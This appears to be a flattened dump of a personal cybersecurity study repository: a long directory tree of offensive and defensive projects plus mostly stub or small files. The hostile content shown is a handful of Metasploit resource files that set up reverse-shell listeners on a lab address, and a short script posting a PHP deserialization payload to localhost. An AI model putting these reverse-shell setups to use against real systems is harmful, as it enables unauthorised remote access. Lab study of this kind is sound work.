├── MyTools ├── RedTeam │ ├── massbuster │ │ ├── README.md │ │ ├── hosts │ │ └── config.json │ ├── wgetexec │ │ ├── r.sh │ │ ├── r.ps1 │ │ └── README.md │ └── gorecon │ │ └── ip.txt └── BlueTeam │ ├── irgather │ └── go.mod │ └── evtinfo │ └── evtinfo.go ├── Phishing └── Gophish │ ├── .gitignore │ ├── igw.tf │ ├── associations.tf │ ├── vpc.tf │ ├── routes.tf │ ├── key_pair.tf │ ├── main.tf │ ├── subnets.tf │ ├── outputs.tf │ ├── nacl.tf │ ├── variables.tf │ ├── user-data.sh │ ├── ec2.tf │ ├── email_templates │ └── google-drive.tmpl.html │ └── README.md ├── PyViruses ├── PyBackdoorInjection │ ├── test │ │ ├── test2.py │ │ ├── test3.py │ │ ├── test4.py │ │ └── test1.py │ └── README.md └── BrowserObstruction │ └── obstruct_browsing.py ├── Cryptography ├── Hashing │ ├── test.txt │ ├── generate_wordlist.py │ ├── file_hashing.py │ └── key_derivation_with_scrypt.py ├── SymmetricEncryption │ ├── CSharpAES │ │ ├── obj │ │ │ ├── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ │ ├── CSharpAES.AssemblyInfoInputs.cache │ │ │ │ │ ├── CSharpAES.genruntimeconfig.cache │ │ │ │ │ ├── CSharpAES.csproj.CoreCompileInputs.cache │ │ │ │ │ ├── CSharpAES.dll │ │ │ │ │ ├── CSharpAES.exe │ │ │ │ │ ├── CSharpAES.pdb │ │ │ │ │ ├── CSharpAES.assets.cache │ │ │ │ │ ├── CSharpAES.csprojAssemblyReference.cache │ │ │ │ │ ├── .NETCoreApp,Version=v3.1.AssemblyAttributes.cs │ │ │ │ │ └── CSharpAES.AssemblyInfo.cs │ │ │ ├── CSharpAES.csproj.nuget.g.targets │ │ │ ├── project.nuget.cache │ │ │ └── CSharpAES.csproj.nuget.g.props │ │ ├── sample.txt.encrypted │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── CSharpAES.dll │ │ │ │ ├── CSharpAES.exe │ │ │ │ ├── CSharpAES.pdb │ │ │ │ ├── CSharpAES.runtimeconfig.json │ │ │ │ ├── CSharpAES.runtimeconfig.dev.json │ │ │ │ └── CSharpAES.deps.json │ │ └── CSharpAES.csproj │ ├── bank_messages_info.txt │ ├── quote.bmp │ ├── images │ │ ├── cbc_image.png │ │ └── ecb_image.png │ ├── ecb_image_encryption.py │ └── cbc_image_encryption.py ├── README.md ├── 
MsgIntegritySignaturesCertificates │ ├── hmac.py │ └── mac.py ├── AsymmetricEncryption │ ├── get_rsa_prime_numbers.py │ ├── homomorphic_rsa.py │ └── brute_force_rsa.py ├── Cryptopals │ └── bases_test.py ├── MoreThanSecrecy │ └── cracking_caesar.py └── LICENSE ├── PortSwiggerAcademy ├── ClientSideAttacks │ ├── WebSockets │ │ └── README.md │ ├── ClickJacking │ │ └── README.md │ ├── DOMBasedVulns │ │ └── README.md │ ├── CrossSiteScripting │ │ └── README.md │ ├── CrossOriginResourceSharing │ │ └── README.md │ ├── CrossSiteRequestForgery │ │ └── README.md │ └── README.md ├── README.md ├── ServerSideAttacks │ ├── README.md │ ├── SQL_Injection │ │ ├── Lab2 │ │ │ └── README.md │ │ ├── Lab1 │ │ │ └── README.md │ │ ├── README.md │ │ ├── Lab3 │ │ │ └── README.md │ │ └── Lab4 │ │ │ └── README.md │ └── Authentication │ │ └── account-lockout-username-enum-turbo-intruder.py └── Wordlists │ ├── usernames.txt │ └── passwords.txt ├── Misc ├── PHPInsecureDeserialization │ ├── pwn.txt │ ├── proof.php │ ├── exploit.sh │ ├── logging.php │ └── attack.php ├── WIFI │ └── WIFIMapper │ │ ├── api.json │ │ └── mac_addr.json ├── Phishing │ └── Pyphish │ │ ├── pyphish │ │ ├── groups │ │ │ ├── users.csv │ │ │ └── menu.py │ │ ├── utils │ │ │ ├── prog_args.py │ │ │ ├── db.py │ │ │ └── autocompleter.py │ │ ├── pages │ │ │ └── menu.py │ │ └── templates │ │ │ └── menu.py │ │ ├── requirements.txt │ │ ├── config.json │ │ ├── README.md │ │ └── Dockerfile ├── ArtOfExploitation │ ├── README.md │ ├── CProgramming │ │ ├── Misc │ │ │ ├── t │ │ │ ├── func_ptrs │ │ │ ├── rand_nums │ │ │ ├── random_nums.c │ │ │ ├── time_ex.c │ │ │ └── func_ptrs.c │ │ ├── Files │ │ │ ├── uid │ │ │ ├── simplenote │ │ │ └── uid.c │ │ └── MemorySegmentation │ │ │ ├── stack_ex │ │ │ ├── memory_segments │ │ │ ├── using_the_heap │ │ │ └── stack_ex.c │ └── Exploitation │ │ ├── envaddr │ │ ├── get_env │ │ ├── notesearch │ │ ├── game_of_chance │ │ ├── notesearch_exp │ │ ├── simple_overflow │ │ ├── notesearch_env_exploit │ │ ├── 
StackBasedBufferOverflows │ │ ├── auth_overflow │ │ ├── auth_overflow2 │ │ ├── auth_overflow.c │ │ ├── auth_overflow2.c │ │ └── convert_to_big_little_endian.py │ │ ├── get_env.c │ │ ├── getenvaddr.c │ │ ├── hacking.h │ │ ├── exploit_notesearch_env.c │ │ └── exploit_notesearch.c ├── DFIR-Tools │ ├── requirements.txt │ ├── config.ini │ ├── README.md │ ├── colors.py │ └── LICENSE ├── PortScanner │ ├── README.md │ └── portScanner_manjaro_screen_capture.png ├── BufferOverflow │ ├── VulnServer │ │ ├── nmap │ │ │ ├── all_ports │ │ │ └── service_enum │ │ └── ex.py │ └── exploit.py ├── fix-ssh-key.sh ├── BashCyOps │ ├── OS │ │ └── detect-os.sh │ └── IncidentResponse │ │ └── commands_ran_with_sudo.sh ├── AttacksOnSUIDAndEnvVariables │ ├── IfsAndPathSystemFunctionAbuse.c │ ├── PathSystemFunctionAbuse.c │ ├── AbusingLdPreload.c │ ├── AttacksViaUserInput.c │ └── CapabilityLeakingVulnerableProg.c ├── RaceConditions │ ├── check_success.sh │ ├── attackingProgram.c │ └── vulnerableRaceConditionProgram.c ├── shellcode.c ├── YARA │ ├── DetectExeWithIP.yar │ └── ExtractFileIPs.yar ├── ReturnToLibc │ ├── find_bin_bash.c │ └── attack_code.py ├── icmp_redirect_attack.py ├── fail_safe_openvpn.sh ├── Caddy │ └── readme.md ├── TCPAttacks │ ├── SynFloodingAttack │ │ └── tcp_syn_flooding.py │ ├── ResetAttack │ │ └── reset_attack.py │ └── SessionHijacking │ │ └── session_hijacking.py ├── DNSAttacks │ ├── google_redirect.py │ ├── local_dns_cache_poisoning.py │ └── hijack_entire_domain.py ├── ARPAttacks │ └── arp_cache_poisoning.py ├── crawler.py ├── url_download.py ├── UDPPingPongAttack │ ├── ping_pong_trigger.py │ └── udp_server.py ├── simple_backdoor.py ├── python_reverse_shell.py ├── gobust.sh ├── CustomBurpExtensions │ └── BurpAddXForwardedFor.py ├── VPNCreation │ ├── tun_interface.py │ └── tap_interface.py ├── WindowsRegistry │ ├── enumerate_registry_hive.py │ └── change_wallpaper.py └── emailer.py ├── APIProjects ├── GitHub │ ├── api.json │ ├── gitsearch │ └── README.md └── Twitter │ └── 
CyberCrawler │ ├── requirements.txt │ ├── api.json │ └── prog_args.py ├── CTFs └── TenableCTF │ ├── Thumbnail │ └── rce.php │ ├── RanEncryptionFixed │ └── ref.py │ └── RabbitHole │ └── sol.py ├── OffensiveGo ├── DLL │ ├── DLLGeneration │ │ └── go.mod │ └── DLLInjection │ │ └── main.go ├── NetcatClone │ ├── client │ └── client.go ├── ShellcodeExecution │ └── ViaSyscall │ │ ├── go.mod │ │ └── go.sum ├── README.md ├── HTTPServers │ ├── CredentialHarvester │ │ ├── Roundcube │ │ │ ├── public │ │ │ │ ├── Flaticon.eot │ │ │ │ └── public_files │ │ │ │ │ └── roundcube_logo.png │ │ │ ├── creds.txt │ │ │ └── main.go │ │ └── Netflix │ │ │ ├── creds.txt │ │ │ └── main.go │ ├── simple_server.go │ ├── router.go │ ├── C2Multiplexing │ │ └── main.go │ ├── middleware.go │ └── auth_with_negroni.go ├── DNS │ ├── DNSExfiltration │ │ ├── go.mod │ │ └── go.sum │ └── Clients │ │ └── ARecordQueries │ │ └── main.go ├── SliverStager │ ├── go.mod │ └── go.sum ├── ProcessInjection │ └── SliverStager │ │ ├── color.go │ │ ├── go.mod │ │ └── main.go ├── PortScanner │ └── main.go ├── HTTPClients │ ├── Metasploit │ │ └── client │ │ │ └── main.go │ ├── requests_json_api.go │ └── requests.go └── EchoServer │ └── main.go ├── PhysicalPentestStuff ├── README.md ├── rubberDucky │ └── scripts │ │ ├── README.md │ │ ├── get-wifi-password.txt │ │ └── quick-gather.txt ├── P4wnP1 │ └── HIDscripts │ │ ├── infectWithPythonVirus.js │ │ └── powershell_reverse_shell.js └── LICENSE ├── AntivirusEvasion └── RemoteProcessAttacks │ ├── ShellCodeInject │ └── Python │ │ └── requirements.txt │ └── ProcessHallowing │ └── Python │ └── process_hallow.py ├── Defense ├── CreatingReports │ └── ScreenShots │ │ ├── requirements.txt │ │ └── README.md ├── Canaries │ └── FileCanaries │ │ ├── secrets.txt │ │ ├── README.md │ │ └── emailer.py ├── Forensics │ ├── Python │ │ ├── README.md │ │ └── TheRegistry │ │ │ └── enumerate_windows_version.py │ └── Go │ │ └── README.md ├── Zeek │ └── Learning │ │ ├── switch-case.zeek │ │ ├── 
vectors.zeek │ │ ├── sets.zeek │ │ ├── events.zeek │ │ ├── records.zeek │ │ ├── tables.zeek │ │ └── check_if_ip_local_or_external.zeek ├── StoredProcedures │ ├── app.sql │ └── stored_procedure.py └── NIST_800_171_COMPLIANT │ └── clamav-download-scan.sh ├── SLAE ├── README.md ├── HelloWorld │ ├── hello │ ├── hello.o │ └── hello.nasm ├── Logical │ ├── logical │ ├── logical.o │ └── logical.nasm ├── TheStack │ ├── stack │ ├── stack.o │ └── stack.nasm ├── Arithmetic │ ├── add_sub │ ├── mul_div │ ├── add_sub.o │ ├── mul_div.o │ └── add_sub.nasm ├── DataTypes │ ├── datatypes │ └── datatypes.o ├── MovingData │ ├── movingdata │ ├── movingdata.o │ └── movingdata.nasm └── compile.sh ├── MalwareAnalysis ├── README.md ├── images │ ├── cff_and_olly_rva.png │ ├── cff_is_file_dll.png │ ├── pe_file_import_dir.png │ └── cff_explorer_dos_header.png └── MalwareAnalysisVMSetup.ps1 ├── TorProjects └── FakeIdentityForTheDarkWeb │ └── requirements.txt ├── HackTheBox ├── README.txt └── Fortune │ └── cmd_inject.py ├── SecureCodeReview ├── OWASP_Code_Review_Guide_v2.pdf ├── code-samples │ ├── sample.3.java.solution.txt │ ├── sample.4.py │ ├── sample.2.java.solution.txt │ ├── sample.1.js.solution.txt │ ├── sample.3.java │ ├── sample.2.java │ └── sample.1.js ├── semgrep │ ├── example-rule2.yml │ ├── example-rule1.yml │ └── README.md ├── container-attack-surface-minimization │ ├── secure-go-build-example.dockerfile │ └── README.md ├── go │ └── xss │ │ ├── basic-xss.go │ │ └── basic_xss_validation.go ├── ruby │ └── command-injection │ │ └── README.md ├── secure-code-practices │ └── README.md └── README.md ├── MetasploitRCFiles ├── linux_x64_shell_handler.rc ├── linux_x86_shell_handler.rc ├── windows_x86_shell_handler.rc ├── windows_x64_shell_handler.rc ├── linux_x64_meterpreter_handler.rc ├── linux_x86_meterpreter_handler.rc ├── windows_x86_meterpreter_handler.rc └── windows_x64_meterpreter_handler.rc ├── DockerStuff ├── MalwareAnalysis │ ├── docker-compose.yml │ └── cyberchef.dockerfile ├── 
C2Deployments │ ├── nginx │ │ ├── main.conf │ │ ├── index.html │ │ └── Dockerfile │ └── silent_trinity.dockerfile ├── VulnerableDeployments │ └── CVE-2021-3156 │ │ └── Dockerfile └── BugBounty │ └── Dockerfile ├── C2Routing ├── caddy │ ├── webdav_server │ │ └── Caddyfile │ └── example_redirector │ │ └── Caddyfile └── nginx │ └── msf_c2_rev_proxy.nginx ├── NucleiTemplates ├── nuclei.yaml.tmpl ├── aws-key-extractor.yaml ├── host-header-ssrf.yaml └── log4shell-detect.yaml ├── Burp ├── CustomActions │ ├── SendUnauthenticatedRequest.java │ ├── CheckForCRLFHeaderInjection.java │ ├── ArbitraryHeaderReflection.java │ ├── QueryParamXSSInjection.java │ ├── HttpParameterPollutionCheck.java │ └── DetectOpenCORSPolicy.java └── Bambdas │ ├── filterOutImages.java │ ├── filterOutImages.json │ ├── IdentifyCachingOracles.java │ ├── highlightPerHttpMethod.java │ └── highlightPerHttpMethod.json ├── MicrosoftAttacks ├── MSHTA │ └── payload.hta ├── MSBuild │ └── TaskTemplate.cs ├── CSharp │ └── powershell.cs ├── readme.md └── Word │ └── python_reverse_shell_macro.txt ├── NSE ├── template.nse └── http-server-header-enum.nse ├── HackingVMs └── blackarch.md ├── WebAppSecurity ├── owasp-api-top-ten │ └── README.md └── ci-cd │ └── README.md ├── tools.sh ├── PyPersistence └── PersistenceViaWindowsRegistry │ └── simple_backdoor.py ├── IntegrationDeliveryDeployment └── top-10-cicd-security-risks │ └── README.md ├── IncidentResponse └── finding_evil.md ├── CheatSheets └── aws-security-best-practices.md ├── AmazonWebServices └── security-services │ └── README.md ├── Containerization └── kubernetes │ └── top-10-security-best-practices-checklist │ └── README.md ├── SnortRules └── boleto.rules └── LearningResources └── README.md /MyTools/RedTeam/massbuster/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /MyTools/RedTeam/wgetexec/r.sh: 
-------------------------------------------------------------------------------- 1 | ls -la 2 | -------------------------------------------------------------------------------- /Phishing/Gophish/.gitignore: -------------------------------------------------------------------------------- 1 | id_rsa.pub 2 | -------------------------------------------------------------------------------- /PyViruses/PyBackdoorInjection/test/test2.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PyViruses/PyBackdoorInjection/test/test3.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PyViruses/PyBackdoorInjection/test/test4.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Cryptography/Hashing/test.txt: -------------------------------------------------------------------------------- 1 | This is a test 2 | -------------------------------------------------------------------------------- /MyTools/RedTeam/massbuster/hosts: -------------------------------------------------------------------------------- 1 | twitter.com 2 | -------------------------------------------------------------------------------- /MyTools/RedTeam/gorecon/ip.txt: -------------------------------------------------------------------------------- 1 | scanme.nmap.org 2 | -------------------------------------------------------------------------------- /MyTools/RedTeam/wgetexec/r.ps1: -------------------------------------------------------------------------------- 1 | Write-Host "Hello" 2 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/WebSockets/README.md: 
-------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Misc/PHPInsecureDeserialization/pwn.txt: -------------------------------------------------------------------------------- 1 | you have been pwned 2 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/ClickJacking/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/DOMBasedVulns/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /APIProjects/GitHub/api.json: -------------------------------------------------------------------------------- 1 | { 2 | "personal_access_token": "" 3 | } -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/CrossSiteScripting/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /APIProjects/Twitter/CyberCrawler/requirements.txt: -------------------------------------------------------------------------------- 1 | gsread 2 | tweepy 3 | -------------------------------------------------------------------------------- /CTFs/TenableCTF/Thumbnail/rce.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /OffensiveGo/DLL/DLLGeneration/go.mod: -------------------------------------------------------------------------------- 1 | module dll-gen 2 | 3 | go 1.17 4 | 
-------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/CrossOriginResourceSharing/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ClientSideAttacks/CrossSiteRequestForgery/README.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Misc/WIFI/WIFIMapper/api.json: -------------------------------------------------------------------------------- 1 | { 2 | "api_name": "", 3 | "api_token": "" 4 | } -------------------------------------------------------------------------------- /PhysicalPentestStuff/README.md: -------------------------------------------------------------------------------- 1 | # Scripts for Physical Pentesting Devices 2 | -------------------------------------------------------------------------------- /AntivirusEvasion/RemoteProcessAttacks/ShellCodeInject/Python/requirements.txt: -------------------------------------------------------------------------------- 1 | psutil 2 | -------------------------------------------------------------------------------- /Defense/CreatingReports/ScreenShots/requirements.txt: -------------------------------------------------------------------------------- 1 | pillow 2 | pyscreenshot 3 | colored -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/groups/users.csv: -------------------------------------------------------------------------------- 1 | First Name,Last Name,Position,Email 2 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/requirements.txt: -------------------------------------------------------------------------------- 1 | gophish 2 | tinydb 3 | colored 4 | tabulate 5 | 
-------------------------------------------------------------------------------- /Misc/ArtOfExploitation/README.md: -------------------------------------------------------------------------------- 1 | ### Code written while reading The Art of Exploitation 2 | -------------------------------------------------------------------------------- /Misc/DFIR-Tools/requirements.txt: -------------------------------------------------------------------------------- 1 | colored 2 | pytenable 3 | ipython 4 | folium 5 | tabulate -------------------------------------------------------------------------------- /Misc/PHPInsecureDeserialization/proof.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /SLAE/README.md: -------------------------------------------------------------------------------- 1 | # Pentester Academy 2 | x86 Assembly Language and Shellcoding on Linux 3 | -------------------------------------------------------------------------------- /Defense/Canaries/FileCanaries/secrets.txt: -------------------------------------------------------------------------------- 1 | email: john_wick@continential.com 2 | password: babayaga -------------------------------------------------------------------------------- /SLAE/HelloWorld/hello: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/HelloWorld/hello -------------------------------------------------------------------------------- /SLAE/Logical/logical: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Logical/logical -------------------------------------------------------------------------------- /SLAE/TheStack/stack: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/TheStack/stack -------------------------------------------------------------------------------- /SLAE/TheStack/stack.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/TheStack/stack.o -------------------------------------------------------------------------------- /SLAE/Arithmetic/add_sub: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Arithmetic/add_sub -------------------------------------------------------------------------------- /SLAE/Arithmetic/mul_div: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Arithmetic/mul_div -------------------------------------------------------------------------------- /SLAE/HelloWorld/hello.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/HelloWorld/hello.o -------------------------------------------------------------------------------- /SLAE/Logical/logical.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Logical/logical.o -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/config.json: -------------------------------------------------------------------------------- 1 | { 2 | "api_key": "", 3 | "host": "https://localhost:3333" 4 | } 5 | -------------------------------------------------------------------------------- /Misc/PortScanner/README.md: -------------------------------------------------------------------------------- 1 | # Python Port Scanner 2 | 
![screenshot](portScanner_manjaro_screen_capture.png) 3 | -------------------------------------------------------------------------------- /Misc/WIFI/WIFIMapper/mac_addr.json: -------------------------------------------------------------------------------- 1 | { 2 | "mac_addrs": [ 3 | "88:75:56:14:D2:85" 4 | ] 5 | } 6 | -------------------------------------------------------------------------------- /SLAE/Arithmetic/add_sub.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Arithmetic/add_sub.o -------------------------------------------------------------------------------- /SLAE/Arithmetic/mul_div.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/Arithmetic/mul_div.o -------------------------------------------------------------------------------- /SLAE/DataTypes/datatypes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/DataTypes/datatypes -------------------------------------------------------------------------------- /SLAE/DataTypes/datatypes.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/DataTypes/datatypes.o -------------------------------------------------------------------------------- /SLAE/MovingData/movingdata: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/MovingData/movingdata -------------------------------------------------------------------------------- /APIProjects/GitHub/gitsearch: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/APIProjects/GitHub/gitsearch -------------------------------------------------------------------------------- /SLAE/MovingData/movingdata.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SLAE/MovingData/movingdata.o -------------------------------------------------------------------------------- /OffensiveGo/NetcatClone/client: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/OffensiveGo/NetcatClone/client -------------------------------------------------------------------------------- /MalwareAnalysis/README.md: -------------------------------------------------------------------------------- 1 | Personal notes and scripts created while reading **Malware Analysis and Detection Engineering** 2 | -------------------------------------------------------------------------------- /OffensiveGo/ShellcodeExecution/ViaSyscall/go.mod: -------------------------------------------------------------------------------- 1 | module viasyscall 2 | 3 | go 1.17 4 | 5 | require golang.org/x/sys v0.1.0 6 | -------------------------------------------------------------------------------- /Misc/PHPInsecureDeserialization/exploit.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | PARAM=$1 4 | curl -X POST -d "param=$PARAM" localhost/demo.php 5 | -------------------------------------------------------------------------------- /TorProjects/FakeIdentityForTheDarkWeb/requirements.txt: -------------------------------------------------------------------------------- 1 | stem 2 | requests 3 | pysocks 4 | fake_useragent 5 | bs4 6 | colored 7 | prettytable 8 | -------------------------------------------------------------------------------- 
/Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | ba201520a5db730041990ee06351385fb711162e 2 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 86c8e15dd33445635927cfaf398408205fd11473 2 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/bank_messages_info.txt: -------------------------------------------------------------------------------- 1 | Ace Inc,Alberto M.,123.00 2 | Evil Corp,Hamlet B.,230.00 3 | Google, Martha R.,500.00 4 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/quote.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/quote.bmp -------------------------------------------------------------------------------- /MalwareAnalysis/images/cff_and_olly_rva.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/MalwareAnalysis/images/cff_and_olly_rva.png -------------------------------------------------------------------------------- /MalwareAnalysis/images/cff_is_file_dll.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/MalwareAnalysis/images/cff_is_file_dll.png -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Misc/t: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/Misc/t -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/envaddr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/envaddr -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/get_env: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/get_env -------------------------------------------------------------------------------- /Misc/BufferOverflow/VulnServer/nmap/all_ports: -------------------------------------------------------------------------------- 1 | # Nmap 7.91 scan initiated Mon Nov 16 16:55:58 2020 as: nmap -p- -oN nmap/all_ports 192.168.91.129 2 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/CSharpAES/obj/Debug/netcoreapp3.1/CSharpAES.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | a1fe76e20690eb46b23e92211506cc1c2fb2b672 2 | -------------------------------------------------------------------------------- /HackTheBox/README.txt: -------------------------------------------------------------------------------- 1 | # HackTheBox 2 | 3 | This repo will contain any payloads or exploits I've used or created while pawning boxes on HackTheBox 4 | -------------------------------------------------------------------------------- /MalwareAnalysis/images/pe_file_import_dir.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/MalwareAnalysis/images/pe_file_import_dir.png -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Files/uid: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/Files/uid -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/notesearch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/notesearch -------------------------------------------------------------------------------- /Defense/CreatingReports/ScreenShots/README.md: -------------------------------------------------------------------------------- 1 | # Setup 2 | 3 | ``` 4 | pip3 install -r requirements.txt 5 | 6 | python3 screenshots.py --help 7 | ``` 8 | -------------------------------------------------------------------------------- /Misc/BufferOverflow/VulnServer/nmap/service_enum: -------------------------------------------------------------------------------- 1 | # Nmap 7.91 scan initiated Mon Nov 16 17:03:29 2020 as: nmap -sC -sV -oN nmap/service_enum 192.168.91.129 2 | -------------------------------------------------------------------------------- /SecureCodeReview/OWASP_Code_Review_Guide_v2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/SecureCodeReview/OWASP_Code_Review_Guide_v2.pdf -------------------------------------------------------------------------------- /MalwareAnalysis/images/cff_explorer_dos_header.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/MalwareAnalysis/images/cff_explorer_dos_header.png -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Misc/func_ptrs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/Misc/func_ptrs -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Misc/rand_nums: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/CProgramming/Misc/rand_nums -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/game_of_chance: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/game_of_chance -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/notesearch_exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/notesearch_exp -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/simple_overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Misc/ArtOfExploitation/Exploitation/simple_overflow -------------------------------------------------------------------------------- /MyTools/BlueTeam/irgather/go.mod: -------------------------------------------------------------------------------- 1 | module 
github.com/binexisHATT/irgather 2 | 3 | go 1.16 4 | 5 | require github.com/manifoldco/promptui v0.8.0 // indirect 6 | -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/images/cbc_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/images/cbc_image.png -------------------------------------------------------------------------------- /Cryptography/SymmetricEncryption/images/ecb_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bin3xish477/cybersecurity/HEAD/Cryptography/SymmetricEncryption/images/ecb_image.png -------------------------------------------------------------------------------- /MetasploitRCFiles/linux_x64_shell_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload linux/x64/shell_reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /MetasploitRCFiles/linux_x86_shell_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload linux/x86/shell_reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /MetasploitRCFiles/windows_x86_shell_handler.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload windows/shell_reverse_tcp 3 | set LHOST 192.168.33.128 4 | set LPORT 7331 5 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/CProgramming/Files/simplenote: 
